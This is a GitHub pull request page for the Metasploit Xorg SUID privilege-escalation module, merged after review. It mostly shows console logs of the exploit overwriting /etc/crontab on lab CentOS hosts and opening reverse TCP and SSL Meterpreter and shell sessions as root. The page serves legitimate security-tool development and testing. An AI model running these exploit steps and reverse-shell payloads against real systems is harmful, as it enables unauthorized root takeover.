New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Improve Xorg_privesc module consolelock check, payload upload & formatting #11015

Merged
merged 2 commits into from Nov 25, 2018

Conversation

Projects
None yet
3 participants
@aringo
Contributor

aringo commented Nov 24, 2018

Was asked to make some adjustments to the check for console lock along with payload upload and formatting. Adjusted and then tested on CentOS and OpenBSD6.4.

msf5 exploit(multi/local/xorg_x11_suid_server) > exploit 

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.30.0.2:4444 
[*] Running additional check for Linux
[+] Console lock for peep
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.5 is vulnerable
[+] Xorg does not appear running
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Max line length is 65537
[*] Writing 911224 bytes in 56 chunks of 39672 bytes (octal-encoded), using printf
[*] Next chunk is 43977 bytes
....... snipped ............
[*] Next chunk is 40137 bytes
[*] Trying /etc/crontab overwrite
[+] /etc/crontab overwrite successful
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Meterpreter session 2 opened (172.30.0.2:4444 -> 172.30.0.60:40608) at 2018-11-24 14:44:13 -0600
[+] Returning session after cleaning
[+] Deleted /tmp/.session-zJFbtiW

meterpreter > cat /etc/crontab
original
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.5.1804 (Linux 3.10.0-862.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

@bcoles bcoles referenced this pull request Nov 24, 2018

Merged

Add module Xorg SUID privesc #10916

6 of 6 tasks complete

@bcoles bcoles self-requested a review Nov 24, 2018

@bcoles

bcoles approved these changes Nov 24, 2018

@bcoles

This comment has been minimized.

Contributor

bcoles commented Nov 24, 2018

Thanks. Apologies for the confusion. I didn't have a chance to test the previous PR before it was landed.

I'll retest this and land.

@bcoles bcoles self-assigned this Nov 24, 2018

@bcoles

This comment has been minimized.

Contributor

bcoles commented Nov 25, 2018

CentOS - Command Shell payload

msf5 exploit(multi/local/xorg_x11_suid_server) > run

[*] Started reverse double SSL handler on 172.16.191.188:4444 
[*] Running additional check for Linux
[+] Console lock for user
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.3 is vulnerable
[!] Xorg in process list
[!] Could not get version or Xorg process possibly running, may fail
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[+] /etc/crontab overwrite successful
[*] Waiting on cron to run
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo zk0jobDMxFdBxLBU;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "zk0jobDMxFdBxLBU\n"
[*] Matching...
[*] B is input...
[*] Command shell session 7 opened (172.16.191.188:4444 -> 172.16.191.141:46318) at 2018-11-24 21:31:04 -0500
[*] Waiting on cron to run
[+] Returning session after cleaning
[+] Deleted /tmp/.session-Tafw0iW0r8

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
uname -a
Linux centos-7-1708.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 7? [y/N]  y
""

[*] 172.16.191.141 - Command shell session 7 closed.  Reason: User exit

CentOS - Meterpreter payload

msf5 exploit(multi/local/xorg_x11_suid_server) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(multi/local/xorg_x11_suid_server) > set target 1
target => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Running additional check for Linux
[+] Console lock for user
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.3 is vulnerable
[!] Xorg in process list
[!] Could not get version or Xorg process possibly running, may fail
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[+] /etc/crontab overwrite successful
[*] Waiting on cron to run
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (816260 bytes) to 172.16.191.141
[*] Meterpreter session 8 opened (172.16.191.188:4444 -> 172.16.191.141:46320) at 2018-11-24 21:32:02 -0500
[+] Returning session after cleaning
[+] Deleted /tmp/.session-hFXoMJcW0

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : centos-7-1708.localdomain
OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.191.141 - Meterpreter session 8 closed.  Reason: User exit
msf5 exploit(multi/local/xorg_x11_suid_server) > 
@bcoles

bcoles approved these changes Nov 25, 2018

@bcoles bcoles merged commit 93db7b3 into rapid7:master Nov 25, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

bcoles added a commit that referenced this pull request Nov 25, 2018

msjenkins-r7 added a commit that referenced this pull request Nov 25, 2018

@bcoles

This comment has been minimized.

Contributor

bcoles commented Nov 25, 2018

Release Notes

This fixes various issues related to Linux targets in the Xorg X11 Server SUID privilege escalation module.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment